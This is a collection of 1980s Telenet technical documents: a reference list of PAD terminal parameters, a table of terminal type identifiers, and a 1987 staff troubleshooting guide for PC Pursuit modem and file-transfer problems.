3 APL ASCII (typewriter-paired)
4 APL ASCII (bit-paired)
5 APL Correspondence
6 APL EBCD
22 Printer Style
This identifies the class of printing mechanism used by the
terminal:
0 Typewriter style terminal
1 Line printer style terminal
23 Terminal Type
This identifies the specific make and model of the terminal.
Values are:
0 Unknown or Synchronous Host
1-126 Terminal codes
127 Asynchronous Hosts
24 Permanent Terminal
This determines whether the network queries for a terminal
identifier or employs a pre-set identifier. Values are:
0 Request identifier (Default)
1 Use pre-set identifier
25 Manual/Automatic Connection
This parameter specifies whether a pre-defined virtual circuit is
to be established automatically for the terminal, or it the call
must be initiated by a C(onnect) or ID command entered from the
terminal. Values are:
0 Manual (Connect or ID required) (Default)
1 Automatic (Address pre-defined)
+26 Rate
This parameter specifies the transmission speed of the terminal,
as determined by the network:
0 110 bps
1 134.5
2 300
3 1200
4 600
5 75
6 150
7 1800
8 200
9 100
10 50
11 75/1200
12 2400
13 4800
14 9600
15 19,200
16 48,000
17 56,000
18 64,000
+27 Delete Character
This specifies the character to be used for single-character
editing.
0 Function disabled
1-127 Identifies the character to be used
Default is decimal 127.
+28 Cancel Character
Specifies the character to be used to delete input data buffered
for the terminal at the PAD.
0 Function disabled
1-127 Identifies the character to be used
Default is decimal 24.
+29 Display Character
Specifies the character to be used for displaying data which has
been accumulated by the PAD.
0 Function disabled
1-127 Identifies the character to be used
Default is decimal 18.
*30 Abort Character
This is an NVT Process Control parameter and should no longer be
used. If NVT Process Control was enabled (Telenet 18:2), then
this parameter specified the character which, when received from
the terminal, caused the PAD to Flush Output (Telenet 33:1) and
generate an X.25 INTERRUPT containing F5 hex in the optional data
byte. Note, data remained flushed until X.3 parm 8 or Telenet
parm 33 was reset to zero.
0 Function disabled (Default)
1-127 Identifies the character to be used
*31 Interrupt Character
This is an NVT Process Control parameter and should no longer be
used. If NVT Process Control was enabled (Telenet 18:2), then
this parameter specified the character which, when received from
the terminal, caused the PAD to generate an X.25 INTERRUPT
containing F4 hex in the optional data byte.
0 Function disabled (Default)
1-127 Identifies the character to be used
32 Automatic Hang Up
This specifies whether the terminal is to be physically
disconnected from the network or left in Command Mode at the end
of a virtual call. Values are:
0 Leave in Command Mode upon disconnect (Default)
1 Hang up upon disconnect
+33 Flush Output
This parameter controls the transmission of all data from the Host
to the terminal:
0 Transmit all information sent from (Default)
the Host to the terminal
1 Discard all information sent from
the Host to the terminal
34 Transmit on Timers
This specifies that characters accumulated by the network are
forwarded upon expiration of either the Idle or Interval Timer.
Values are:
0 Disable transmission on timers
1 Enable transmission on timers (Default)
+35 Idle Timer
The Idle timer defines the time interval between characters
arriving from the terminal which, when exceeded, causes the
network to transmit any accumulated characters to the Host.
Values are:
0 Timer disabled
2-255 Multiples of 50 ms (.05 seconds)
Note: Default is 80 (4 seconds)
36 Interval Timer
The Interval Timer specifies the maximum time period during which
the network PAD will accumulate characters before forwarding them
to their destination. Values are:
0 Timer disabled (Default)
2-255 multiples of 50 ms (.05 seconds)
37 Network Usage Display
This controls the transmission of information on chargeable network
usage provided at the end of a virtual call. Values are:
0 Exclude network-generated usage information
from the DISCONNECTED message (Default)
1 Include network-generated usage information
from the DISCONNECTED message
38 Carriage Return Padding (Variable)
This specifies the amount of time-delay padding to be provided
after each carriage return sent to the terminal, for every 10
printable characters on the line (E.g., no padding for nine
characters; five time the value of parameter 38 for 50 characters.)
Values may run from 0 through 7.
39 Padding Options
This parameter specifies whether or not the network provides time
delay padding after form effectors sent to the terminal. Values
are:
0 Network provides no time delay padding
1 Network provides time delay padding (Default)
after CR, LF, and HT characters
40 Insert on Break
This specifies whether or not the PAD inserts the Break Code in the
data stream at the point at which the break signal is received from
the terminal. Values are:
0 Do not insert on break (Default)
1 Insert Break Code on break
+41 PAD-to-Terminal Flow Control
This parameter specifies network XON/XOFF control of transmission
from the terminal. Values are:
0 No PAD-to-Terminal Flow Control (Default)
1 Network provides flow control
42 PAD-to-Terminal XON Character
This identifies the character which, when sent from the network to
the terminal, causes the terminal to resume transmission of
buffered data. Value may be any character from 1 to 127. Default
is 17 (19 octal, 11 hex).
43 PAD-to-Terminal XOFF Character
This identifies the character which, when sent from the network to
the terminal, causes the terminal to temporarily suspend
transmission of buffered data. Value may be any character from 1
to 127. Default is 19 (21 octal, 13 hex).
*44 Generate Break
This parameter used to cause a break signal to be transmitted
from the PAD to the terminal. It is no longer valid to set this
parameter.
*45 APP on Break
This parameter specified whether or not the PAD transmitted a
SET & READ PARAMETERS PAD Message to the Host system when a break
signal was received from the terminal. This parameter should no
longer be used.
0 No SET & READ PARAMETERS PAD Message (Default)
generated on break
1 SET & READ PARAMETERS PAD Message generated
on break
*46 Input Unlock Option
This archaic parameter specifies what action the PAD took after the
terminal user had entered a line of data, the keyboard had been
locked, and the PAD had no data to deliver to the terminal. Values
are:
0 Unlock based on timer expiration (Default)
1 Unlock based on input data content
*47 Input Unlock Timer
This archaic parameter specified the time interval that the PAD
would wait before unlocking the terminal keyboard, if the PAD had
no data pending delivery to the terminal and parameter 46 was set
to 0. Values ranged from 0 through 255 multiples of 50 ms (.05
seconds). Default was 0 seconds.
*48 Input Unlock Character
This archaic parameter specified the character which, when appearing
at the beginning of a data line, caused the PAD to leave the keyboard
locked at the end of the data line (if there is no data pending
delivery to the terminal). Value was any character code from 0
through 127; or 240, which leaves the keyboard locked after all
characters. Default was 0.
*49 Output Lock Option
This archaic parameter specified the action the PAD took when it
received data for delivery to the terminal, when the keyboard was
unlocked for input from the terminal. Values are:
0 Discard output data
1 Transmit output after input completion
2 Transmit output id input idle (Default)
*50 Output Lock Timer
This archaic parameter defined the interval between characters
arriving from the terminal which, when exceeded, caused the PAD
to lock the keyboard when it had output pending delivery to the
terminal. Values may range from 0 through 255 multiples of 50 ms
(.05 seconds). Default was 10 (500ms).
*51 Output Lock Option
This archaic parameter specified what action the PAD took after it
had transmitted all pending data to the terminal. Values are:
0 Unlock based on timer (Default)
1 Unlock based on output completion
2 Unlock based on output data content
+53 Break Options
This allows for a combination of options for handling break signals
from the terminal. Values may be OR-ed together:
0 No options selected (Default)
1 Interrupt on break
4 APP on break
32 Insert on break
Note, X.3 parameter 7 should be used instead of this parameter
54 Terminal-to-PAD Flow Control
This parameter specifies XON/XOFF control of transmission from the
network. Values are:
0 No Terminal-to-PAD flow control (Default)
1 Network respects flow control
55 Terminal-to-PAD XON Character
This identifies the character which, when sent to the network,
causes the network to resume the transmission of buffered data.
Value may be any character code from 1 through 127. Default is 17
decimal.
56 Terminal-to-PAD XOFF Character
This identifies the character which, when sent to the network,
causes the network to temporarily suspend the transmission of
buffered data. Value may be any character code from 1 through 127.
Default is 19.
57 Connection Mode
This parameter specifies which level of terminal code conversion
the PAD is to perform during data transfer mode. Values are:
0 Transparent
1 Real
2 Virtual (Default)
+58 Connection Escape
This parameter specifies whether or not the terminal may escape
from Data Transfer mode to Network Command mode. Values are:
0 Escape not possible
1 Escape possible (Default)
*59 Flush Output on Break
This parameter specified whether or not the PAD transmitted a SET &
READ PARAMETER PAD Message to the Host and began discarding output
to the terminal when a break signal was received from the terminal.
Rather than using this parameter set X.3 parameter 7 to 21
(decimal).
0 No SET & READ PARAMETERS PAD Message (Default)
sent and no output flushed
1 SET & READ PARAMETERS PAD Message sent and output
to the terminal
60 Delayed Echo
This parameter identified whether echo from the PAD to the terminal
will occur immediately or whether it will be delayed to appear
between data from incoming packets. If 60:1, then once the PAD has
begun processing an incoming packet, it will buffer echo characters
until it completes the packet. At that point, it will transmit all
buffered echo characters back to the terminal before processing the
next incoming packet. Values are:
0 Echo immediately (Default)
1 Delay echo to occur between incoming packets
63 Eight-bit Transparency
This parameter identifies whether the terminal uses the eighth
(most significant) bit for data or as a parity bit. Note, if
Telenet parameter 57:2, this parameter cannot be set to zero.
Values are:
0 No parity, eight-bit transparency
1 Parity required (Default)
64 Early ACK
This parameter specifies whether or not the PAD for terminal
support should acknowledge data packets received for the terminal
prior to transmitting the packets (in the form of a character
stream) to the terminal. Values are:
0 Acknowledge data packets after transmission
to the terminal (Default)
1-7 Acknowledge data packets 1-7 packets prior to
transmission to the terminal
Note: *Extreme Caution* should be exercised when modifying this
parameter. The increased "artificial window" size does not
guarantee packet delivery to the terminal. Large amounts of
data could be lost from any form of network disconnect.
Values of 5 or greater should never be used.
65 M-bit handling
This parameter specifies whether the terminal PAD will set the M-bit
on all full packets, on certain full packets, or on packets. Values
are:
0 M-bit is always zero
1 M-bit is set to one for certain full packets
3 M-bit is set to one in all full packets (Default)
If parameter 65:1, the PAD will set the M-bit on all full packets
except where the last user-entered character is a data-forwarding
character, as defined by X.3 parameter 3 (Transmit Mask). If,
however, the final character in the packet is a carriage return and
X.3 parameter 13 causes a line feed insertion following the carriage
return and X.3 parameter 3 marks carriage return as a data-forwarding
character, then the M-bit will be set to 1. The PAD will then
transmit a second packet, with M-bit set to 0, containing only a
line feed character.
If, after sending a packet with M-bit set to one, the PAD must send
a data-qualified packet (Q-bit=1), this is considered a data-
forwarding condition. Thus, the PAD will send a data packet with
M-bit = 0 containing the characters currently in its buffer. If
the buffer is empty the PAD will send an empty packet with M-bit = 0.
This prevents a protocol violation.
66 Defer Processing of User Input
This parameter instructs the PAD to halt processing of user input
data and buffer the data (to a maximum of 32-64 characters). Upon
disconnect, parameter 66 is rest and processing of user data resumes.
If the disconnect triggers a reselection (e.g., forwarding of the
call by TAMS), the buffered data is sent to the new called DTE
Otherwise, or if reselection fails, the data is interpreted by the
PAD as a command during command mode. Values are
0 Process user input normally (Default)
1 Defer processing of user input data
67 ESP Packetizing Option
This parameter specifies whether accumulated data is to be packet-
izied when the Escape Sequence Initiator is received (i.e., before
the Escape Sequence) and when the Escape Sequence is completed.
Values are:
Packetize Packetize
Before After
0 No No (Default)
1 No Yes
2 Yes No
3 Yes Yes
68 Escape Sequence Timer
This parameter specifies the maximum idle time allowed before ESP
processing expires. Values range from zero through 255 and
represent 50 ms intervals. Resolution of the timer is zero to
minus 50 ms (e.g., a value of 2 represents 50ms < timer < 100ms).
Default is zero.
69 Escape Sequence Maximum Length
This parameter specifies the maximum number of characters that may
be contained in an Escape Sequence, including the Escape Sequence
Initiator. A value of zero disables parameter 69 and the maximum
Escape Sequence is 128 characters. Default is zero and values
greater than 127 are not allowed.
70 Escape Sequence Initiator
This parameter specifies the seven-bit representation of the Escape
Sequence Initiator character (values 1-127). The default value of
zero disables Escape Sequence Processing altogether.
71 Parameter Reset on Disconnect
This parameter specifies the manner in which parameters are to be
treated upon disconnect. Values are:
0 Reset ITIs to their initial values (Default)
1 Do not reset ITIs, except for reselect-related
parameters (66 and 71)
2 Do not reset ITIs, except set 66:0 and 71:1
3 Do not reset ITIs, except set 66:0
Value 1 makes parameter 71 a "one-shot" parameter, this is it
clears itself after being invoked once. Value 2 is a "two-shot"
value and value 3 leaves parameter 71 active until explicitly
reset.
+261
View File
@@ -0,0 +1,261 @@
Terminal Identifiers
The following tables matches Terminal numerical IDs (telenet parmater 23)
Generic and Specific Terminal Identifiers.
ID # Generic Term ID Terminal Type (note)
---- ------- ------- ---------------------------
0 Unknown or Synch. Host
1 B1 AJ63 Anderson Jacobson 630
2 B5 AJ86 Anderson Jacobson 860 (9)
3 A2 CD30 CDI 1030
4 D1 DP22 Datapoint 2200
5 D2 DP30 Datapoint 3000 & 3300
6 D3 HP21 Hewlett-Packard 2100s (9)
7 A2 CT30 CT Execuport 300
9 A4 GE30 GE Terminet 300
10 A3 GE12 GE Terminet 1200
11 D1 HZ20 Hazeltine 2000
12 E1 IBM1 2741 EBCD (5)
13 E2 IBM2 2741 EBCD (6)
14 E3 IBM3 2741 EBCD (7)
15 E4 IBM4 2741 EBCD (8)
16 C1 IBM5 2741 Correspondence (1)
17 C2 IBM6 2741 Correspondence (2)
18 C3 IBM7 2741 Correspondence (3)
19 C4 IBM8 2741 Correspondence (4)
20 D1 T4/2 Special Terminal
26 A1 TT33 Teletype 33
27 A1 TT35 Teletype 35
30 D1 TT40 Teletype 40
32 A7 TI25 TI 725
33 A2 TI33 TI 733 (Default)
34 A6 TI45 TI 735
35 B2 UV50 Univac DCT 500
38 D1 IFVD Infoton Vistar Display
39 D1 RI34 Teleray 3300-3700
40 A5 TN30 GE Terminet 30
41 A8 DECW DEC LA35/36 Decwriter II
43 A3 TN12 GE Terminet 120
44 A9 CT12 CT Execuport 1200
45 A1 Generic Terminal
46 A2 Generic Terminal
47 A3 Generic Terminal
48 A4 Generic Terminal
49 A5 Generic Terminal
50 A6 Generic Terminal
51 A7 Generic Terminal
52 A8 Generic Terminal
53 A9 Generic Terminal
54 D1 ADDS ADDS 520, 580, 980
55 B3 AJ83 AJ 830 & 832
56 B1 Generic Terminal
57 B2 Generic Terminal
59 D1 BHMB Beehive MiniBee 2
60 C1 Generic Terminal
61 C2 Generic Terminal
62 C3 Generic Terminal
63 C4 Generic Terminal
64 D1 CD11 CDI 1132
65 A2 CD12 CDI 1202 & 1203
66 D1 Generic Terminal
67 D2 Generic Terminal
68 D1 DECV DEC VT50 & VT52
69 D1 DGLG Digi-Log 33, Telecomputer I
70 A1 DPPT Data Products Portaterm
71 B3 DS16 Diablo 1550 & 1620
72 E1 Generic Terminal
73 E2 Generic Terminal
74 E3 Generic Terminal
75 E4 Generic Terminal
76 B3 GS30 Gen-Comm Systems 300
77 D1 HP26 HP 2640, 2644, 2645
78 D1 LSAM Lear Siegler ADM1, 2, 3
79 A2 NC60 NCR 260
80 B1 TD40 Trendata 4000
81 D1 TI45 TI 745
82 D2 TI65 TI 763, 765 (10)
83 D1 TK40 Tektronix 4002-4023
84 B3 TT43 Teletype 43
85 A3 WU30 Western Union EDT 30
86 A4 WU12 Western Union EDT 1200
87 B3 DT30 Data Term & Comm DCT 300-30 2
88 B3 Generic Terminal
89 B4 Generic Terminal
90 B5 Generic Terminal (9)
91 D3 Generic Terminal (9)
127 Asynchronous Hosts
The following are terminal models with corresponding generic terminal
types supported by the terminal handler.
Terminal Model ID (note)
------------------------------------- ---------
ADDS Consul 520, 580, 980 D1 (1)
ADDS Envoy 620, Regent D1 (1)
Alanthus Data Terminal T-133 A1
T-300 A8
T-1200 A3
Alanthus Miniterm A2
AM-Jacquard Amtext 425 D1 (1)
Anderson Jacobsen 510 D1 (1)
Anderson Jacobsen 630 B1
Anderson Jacobsen 830 & 832 B3 (2)
Anderson Jacobsen 860 B5
Apple II D1 (1)
Atari 400, 800 D1 (1)
AT&T Dataspeed 40/1, 40/2, 40/3 D1 (1)
Beehive MiniBee, MicroBee D1 (1)
Centronics 761 A8
Commodore Pet D1 (1)
Compu-Color II D1 (1)
Computer Devices CDI 1030 A2
Computer Devices Teleterm 1132 A8
Computer Devices Miniterm 1200 series A2
Computer Transceiver Execuport 300 A2
Computer Transceiver Execuport 1200 A2
Computer Transceiver Execuport 4000 A2
CPT 6000, 8000 D1 (1)
Datamedia Elite D1 (1)
Datapoint 1500, 1800, 2200, 3000, 3300,
3600, 3800 D1 (1)
Data Products Portaterm A1
Data Terminal & Comm DTC 300, 302 B3 (2)
Diablo Hyterm B3 (2)
Digi-log 33 & Telecomputer II D1 (1)
DEC (LA 35-36) Decwriter II A8
DEC (LA 120) Decwriter III A8
DEC VT50, VT52, VT100, WS78, WS200 D1 (1)
Gen-Comm Systems 300 B3 (2)
GE Terminet 30 A5
GE Terminet 120, 1200 A3
GE Terminet 300 A4
General Terminal GT-100A, GT-101, GT-110,
GT-400, GT-400B D1 (1)
Hazeltine 1500, 1400, 2000 D1 (1)
Hewlett Packard 2621 D3
Hewlett Packard 2640 series D1 (1)
IBM PC (and compatibles) D1 (1)
IBM 3101 D1 (1)
Informer I304, D304 D1 (1)
Infoton 100, 200, 400, Vistar D1 (1)
Intelligent Systems Intecolor D1 (1)
Intertex Intertube II D1 (1)
Lanier Word Processor D1 (1)
Lear Siegler ADM series D1 (1)
Lexitron 1202, 1303 D1 (1)
Memorex 1240 A2
Micom 2000, 2001 D1 (1)
NBI 3000 D1 (1)
NCR 260 A2
Perkin-Elmer Model 110, Owl, Bantam D1 (1)
Perkin-Elmer Carousel 300 Series A8
Radio Shack TRS 80 D1 (1)
Research Inc. Teleray D1 (1)
Tektronix 4002-4023 D1 (1)
Teletype Model 33, 35 A1
Teletype Model 40 D1 (1)
Teletype Model 43 B3 (2)
Teletype Model 40/1, 40/2, 40/3 D1 (1)
Texas Instrument 725 A7
733 A2
735 A6
743, 745, 763, 765 D1 (1)
820 B3 (2)
99/4 D1 (1)
Trendata 4000 (ASCII) B1
Tymshare 110, 212 A2
315 A8
325 B3 (2)
Univac DCT 500 B4
WANG 20, 25, 30, 105, 130, 145 D1 (1)
Western Union EDT 30, 35 A1
300 A4
1200 A4
XEROX 800, 850, 860 D1 (1)
XEROX 1700 B3 (2)
Notes: (1) Use D3 if you wish Telenet to respond to XON/XOFF
flow control.
(2) Use B5 if you wish Telenet to respond to XON/XOFF
flow control.
The following are the major characteristics of the generic terminal
types supported by the terminal handler:
Generic Tab LF CR Pad CR Pad Line Code
Pad Pad Fixed Var'bl Size Type (note)
------- --- --- ------ ------ ---- -----------------------
A1 0 1 0 0 72 ASCII
A2 0 2 7 0 80 ASCII
A3 0 0 0 0 120 ASCII - Printer
A4 0 6 0 0 120 ASCII
A5 0 5 5 0 120 ASCII
A6 0 0 1 1 80 ASCII
A7 0 4 0 2 80 ASCII
A8 2 0 1 0 132 ASCII
A9 12 10 16 6 132 ASCII
B1 1 0 2 1 132 ASCII--BUFFERED
B2 0 2 6 0 132 ASCII--BUFFERED
B3 0 0 0 0 132 ASCII--BUFFERED
B4 0 2 10 0 132 ASCII--BUFFERED
B5 0 0 0 0 132 ASCII--BUFFERED (9)
C1 1 1 4 1 130 2741 Correspondence (1)
C2 1 1 4 1 130 2741 Correspondence (2)
C3 1 1 4 1 130 2741 Correspondence (3)
C4 1 1 4 1 130 2741 Correspondence (4)
D1 0 0 0 0 80 ASCII--CRT
D2 0 0 0 0 72 ASCII--CRT
D3 0 0 0 0 80 ASCII--CRT (9)
E1 1 1 4 1 130 2741 EBCD (5)
E2 1 1 4 1 130 2741 EBCD (6)
E3 1 1 4 1 130 2741 EBCD (7)
E4 1 1 4 1 130 2741 EBCD (8)
Notes:
(1) Corresponds with Ball Types: 001, 005, 007, 008, 012, 020, 030,
050, 053, 067, 070, and 085. Ball Type code can be found
underneath the locking tab of the ball on an IBM 2741 terminal.
(2) Corresponds with Ball Types: 006, 010, 015, 019, 059, and 090.
(3) Corresponds with Ball Types: 021, 025, 026, 027, 028, 029, 031,
032, 033, 034, 035, 036, 037, 038, 029, 060, 068, 086, 123, 129,
130, 131, 132, 133, 134, 135, 146, 137, 138, 139, 140, 141, 142,
143, 144, 145, 156, and 161.
(4) Corresponds with Ball Types: 043 and 054.
(5) Corresponds with Ball Types: 963, 996, and 998.
(6) Corresponds with Ball Types: 938, 939, 961, 962, and 997.
(7) Corresponds with Ball Types: 942 and 943.
(8) Corresponds with Ball Types: 947 and 948.
(9) Terminal Types D3 and B5 enable Terminal-to-PAD flow control in
the Terminal PAD (TFLOW).
(10) The specific Terminal ID, TI65, incorrect maps to the generic
ID, D2. Since TI 763 and 765 print 80 character per line, users
with these terminals should specify a generic TERM ID of either
D3 (TFLOW enabled) or D1 (TFLOW not specified).
+337
View File
@@ -0,0 +1,337 @@
1/18/87 TROUBLESHOOTING PC PURSUIT CALLS
(Tips for helping Cust. Svc. help Pursuit callers)
This is a list of typical questions about PC Pursuit and some answers that
should help. I will not swear that everything--or anything--is accurate.
However, most of the explanations will, at least, help most PC Pursuit
customers.
GENERAL RULES
"""""""""""""
First, listen to what the customer is saying. Some of these guys have more
experience with data communications than anyone in this building, let alone in
this department. They will obviously not be impressed if you run on autopilot
through the typical "are you at 8 bits and no parity" sort of question. Calls
tend to be one of two types: general, simple informational questions and
specific technical problems. If you treat one of the latter as if it were one
of the former, you will do little to convice the customer that you are steering
him correctly.
Second, don't be too eager to dump the customer onto someone else or off the
line. This will make life easier for whoever has to eventually solve the
problem.
SPECIFIC PROBLEMS
"""""""""""""""""
"I can't connect to a port; I keep getting D/DCWAS/12 [or whatever] BUSY."
----------------------------------------------------------------------------
Explain that these are legitimate busies and that port expansion, both in
adding new cities and in expanding existing rotaries, is underway.
We *will* be adding several hundred new lines to the system. Many cities
have already been upgraded, and more are being completed all the time.
"I connect to a port but I get hung. Not even ATZ will appear."
------------------------------------------------------------------
If they're currently in the frozen port (some users know enough to hold it
open and call us on another line), run a port scan to see where they're
connected. Reset the port to knock them out, C-space to it, and if you can't
clear the trouble, busy it out and send a ticket to the field. (This should be
old hat by now, with the troubles we've recently found in the new DC modems.)
If they are not connected, your only approach is to try to connect directly
to each port and see if any refuses to respond. If you can't find a malfunc-
tioning modem, make sure the user was entering "ATZ" in capital letters.
"I connect to a port and enter ATZ but everything seems to hang."
--------------------------------------------------------------------
Check to see if they are using a Hayes compatible modem. The PCP modems use
a limited subset of the Hayes "AT" commands. In theory, a working Hayes or
compatible modem will ignore these commands while in a data transfer state. To
place such a modem in command mode, the user must rapidly enter three plus
signs (+) in a row and then wait until the modem acknowledges the command
before entering any more data.
However, malfunctioning modems or some of the not-quite-compatible (usually
cheaper) modems will act on "AT" commands from within data transfer. When the
user enters the ATZ command to wake up the PCP modem, it instead resets the
user's modem, usually dropping the connection. This would also happen if the
string "ATZ" was encountered during a file transfer.
There's not a lot we can do to diagnose this, and PCP users
take none too kindly to the suggestion that their bargain modems are no
bargain. As a test, have the user connect to a port and enter one of the Hayes
commands not supported by the PCP modems--for instance, ATH0, which hangs up
the modem, or ATH1, which "lifts" it off the hook. If they are actually
talking to the PCP modem, it will respond with an "OK" and do nothing else; if
they are talking to their own modem, it will drop carrier.
To use PCP successfully, they will either (1) have to replace or repair
their modem, (2) find a way to disable its break to command mode, or (3) try
to throw the PCP port into Racal-Vadic mode (with a Ctrl-E). Note that the
latter solution does not always work unless the modem has been reset with an
ATZ command--which, of course, is out of the question--and may not always be an
option, depending on hardware manufacturer and version.
I have yet to find an instance of this that was not trouble on the
customer's end, but I expect we will.
"I try to call this number from a PCP modem and I get a busy. I dial it
immediately after hanging up [or from another line] and I get through. I try
it again on PCP and get a busy."
--------------------------------------------------------------------------------
First, make sure that the number they are dialing is within the accepted
exchanges for a given city (see the list in the PCP guide). Note that there
are a few exchanges that can be reached that are not on the list; a slightly
more up-to-date list is available on the Net Exchange BBS.
If the number should be valid, see if you can isolate the port the user is
calling from. Connect to that port, issue "ATZ", and send the modem a Ctrl-E
and carriage return. This will throw the modem into Racal-Vadic mode, which
provides better diagnostics than Hayes mode. Try to dial the number and see
what transpires. Racal-Vadic mode will report on the absence of a dial tone,
each ring as it occurs, and the ultimate outcome of the call. Take appropriate
action. (Also, the new modems--the new ones in DC, not the ones that will be
used for the expansion--give a "NO DIAL TONE" message from within Hayes
emulation mode.)
If the user is certain that the exchange is local to the PCP city, ask him
to leave a message to the SysOp (i.e., Dave) on the Net Exchange board.
If you get a connection or what appears to be a legitimate busy, inform the
customer and chalk it up to chance and a busy BBS.
"Sometimes when I connect to a port, I get a message that says 'MANUAL ANSWER'
and I can't do anything but disconnect."
-------------------------------------------------------------------------------
Since the Racal-Vadic mode provides better diagnostics (see above), many
users shift into it before dialing their BBS. If they terminate abnormally
(that is, if the session, not the user, terminates abnormally), the modem may
be left in Racal-Vadic mode.
For instance, User A uses Racal-Vadic mode to call a board. He then gets
bumped off the line (or perhaps hangs up before returning the modem to Hayes
emulation) and User B connects to the port before the modem has a chance to
reset (assuming it resets at all). The modem has sent the Racal-Vadic prompt--
an asterisk--to User A and is waiting for a command. User B sees no response--
the prompt has already been sent--so he assumes the modem is in Hayes mode. He
enters "ATZ" and waits for the "OK". (To make matters worse, perhaps he is
using a command script that needs to "see" an "OK" before proceeding.)
The modem, currently ignorant of Hayes commands, interprets the "A" of the
"ATZ" as being the Racal-Vadic command to answer a call manually; that is, to
take the line off-hook and respond to the call. It does so, having first sent
the user the message "MANUAL ANSWER." Since people rarely dial *into* a PC
Pursuit line, nothing happens and the modem just sits.
To get the user out of this trap, have him enter carriage returns until the
modem drops the line and prompts him with another "*". At this prompt, have
the user enter "I". This is a nonintuitive command--the "I" stands for "IDLE"
--but it has the happy result of returning the modem to Hayes mode.
There is a file called rvprimer.txt on the Net Exchange which describes the
Racal-Vadic mode.
"I use XMODEM across the system and transfers take twice [or thrice] as long as
they should. Why?"
--------------------------------------------------------------------------------
As best as I can tell, the information we were passed from the Net Exchange
BBS was well-meaning but wrong. Here is the scenario as I figger it--someone
let me know if I'm wrong, too.
XMODEM sends data in a 132-byte block that resembles a mini-packet:
<------------------------- Direction of transmission
[SOH] [#] [#] [DATA] [CHK]
| | | | |___ "Checksum" (kinda) for error-detection
| | | |__________ 128 bytes of data
| | |_______________ "One's complement" of block number
| |___________________ Block number
|________________________ Start of header (ASCII 01)
This closely matches the size of a Telenet packet (generally 128 bytes) and
can, for our purposes, be considered a packet's worth of data. PC Pursuit is
set to forward data only on full packets and on expiration of idle timers
(which are set for 1/10 second).
The delay occurs because a connection through PC Pursuit goes through four
modems and two entirely separate data transmissions. Each block of data must
undergo the following (assuming a download from the BBS to the user):
_____ _________ __________
| |____ ( )____ | |
| BBS | /____( PDN ) /____| PCP user |
|_____| (_________) |__________|
|_______| |_______| |_______|
| | |_____ 1.1 seconds
| |_______________ Variable (0.1 to 1+ seconds)
|_________________________ 1.1 seconds
That's potentially 3+ seconds to transfer data that would take slightly over
1 second to transmit in a direct connection--maybe 35% efficiency.
To make matters worse, the acknowledgment (ACK) from the user to the BBS may
take upwards of a second--instead of a fraction of a second--to be transmitted
back into the network, have idle timers expire, be forwarded to the outdialer,
and be transmitted to the BBS. As you can see, though, the real delay is *not*
because of the delay in sending the ACK, but because the block size and packet
size so nearly match, the two computers are almost never working
simultaneously.
A protocol that uses a larger block size--YMODEM, for instance--will run
faster over the system, but not because it needs fewer acknowledgements.
Instead, while sending the larger block, it causes data forwarding on a full-
packet condition. After the first packet gets sent, both machines are doing
work for most of the rest of the transmission, as such:
BBS USER
""" """"
Start of 1K block Sends packet 1 Does nothing
Sends packet 2 Receives packet 1
Sends packet 3 Receives packet 2
Sends packet 4 Receives packet 3
Sends packet 5 Receives packet 4
Sends packet 6 Receives packet 5
Sends packet 7 Receives packet 6
End of 1K block Sends packet 8 Receives packet 7
Does nothing Receives packet 8
(Of course, the BBS is not really sending the *packet*, just a packet's worth
of data.) In effect, YMODEM wastes only 2 of every 9 128-byte transfers; it
should run at about 75% efficiency. In addition, since it only has a single
ACK per kilobyte (instead of 8), less time is spent in waiting for the idle
timer to expire.
Of course, to make things more confusing, there are XMODEM packages using
256-byte and 1K blocks and XMODEM packages that allow a "window" of
unacknowledged blocks to be sent, among other flavors. If the user is using
one of the strange XMODEMs, he'll usually know enough to mention it.
Recently, the default parameters for the PC Pursuit ports were changed; by
whom, I don't know. For best results, users should break to command mode and
set X.3 parameters 1 and 10 to 0 (disables break to command mode and word wrap)
and set ITI parameter 57 to 1 and parameter 63 to 0 (enable 8-bit transparent
mode). This is all done with similar commands as those issued when connecting
to Exec PC.
"I can't use PUNTER protocol across the network."
-------------------------------------------------
I have sent word (through a friend) for Steve Punter to call me to discuss
what might be going wrong with his procotol for Commodore machines. However,
as best as I can tell, PUNTER protocol has a severely restrictive time-out
setting--the amount of time it will wait for an acknowledgement back from the
receiving site before assuming a block was lost and retransmitting it. As the
diagram above shows, PC Pursuit introduces a lot of delay into the loop, and
this is too much for the BBS to take. It starts to send the "lost" block
again; the receiving station finally receives and acknowledges the block; and
everything falls apart. (This is complete assumption, by the way; I haven't
been able to find any hard info on PUNTER, although I am told it works in 256-
byte blocks.) If this is true, I doubt PUNTER would even work over a satellite
long-distance connection, so PUNTER BBSs will probably soon offer a "relaxed"
PUNTER. Often, Commodore users having no luck with PUNTER have been able to
run successful XMODEM transfers.
"I have no [or little] trouble downloading from a BBS, but my uploads often
fail."
-----------------------------------------------------------------------------
This also seems to be related to time-out periods, but I'm not sure.
Because a 132-byte block will be sent in 2 packets and, thus, activity on
sending and receiving ends may overlap slightly, it is conceivable that the
delay between sending the last byte of a data block and receiving the ACK would
be a tiny bit less than the delay between sending the ACK and receiving the
first byte of the next block. (Note: Here I am grasping for straws.) If the
BBS has a particularly unforgiving time-out setting, it might reject the block
or get out of sync (see the PUNTER hypothesis, above). Several Texas
Instrument computer users have been able to trick PC Pursuit into handling
transfers by calling into the networkj at 300 baud but calling out at 1200; I
haven't the foggiest idea why this works, unless the time-out period is
relatively more relaxed at the faster speed.
"I can't get the listing of BBSs on the Net Exchange BBS to download" or "I've
downloaded the listing of BBSs but can't read it; it's garbage."
-------------------------------------------------------------------------------
Files with the extension .SQ have been squeezed; there are a number of
slightly different programs and variations for doing this, some compatible with
others. Many machines have access to some sort of squeezing utility; whether
or not the file downloaded is in the proper format is another question.
Files with the extension .LBR have been libraried; this procedure combines a
number of files into a single file, usually without data compression. The
resulting file is easier to download and catalog than the individual files
would be, and takes up slightly less room. LU is the main program for
librarying files in the IBM-compatible environment; I know of no comparable
programs for other machines.
Files with the extension .ARC have been archived; this is a technique that
both squeezes and libraries files. Files are usually archived with ARC, a
user-supported program distributed by System Enhancement Associates. As far as
I know, there is only an official ARC for IBM-style computers; I think, but am
not sure, that there is a compatible program for CP/M-based machines (like the
Kaypro) and machines running Un*x. I know of no other computers that can make
use of .ARC files.
"What do NO CARRIER and NO ERROR CONTROL mean? I saw them in a recent
connection to Wash D.C. (D/DCWAS)."
------------------------------------------------------------------------
The modems in Wash D.C. are the new Vadic modems, which will also
support 2400 outdial when deployed. These new modems have expanded response
messages. NO CARRIER is seen in the Hayes mode when carrier has been
dropped between the Telenet outdial modem and the target BBS which the
user dialed. The user still has control of the modem and can dial a
new number in the city if desired.
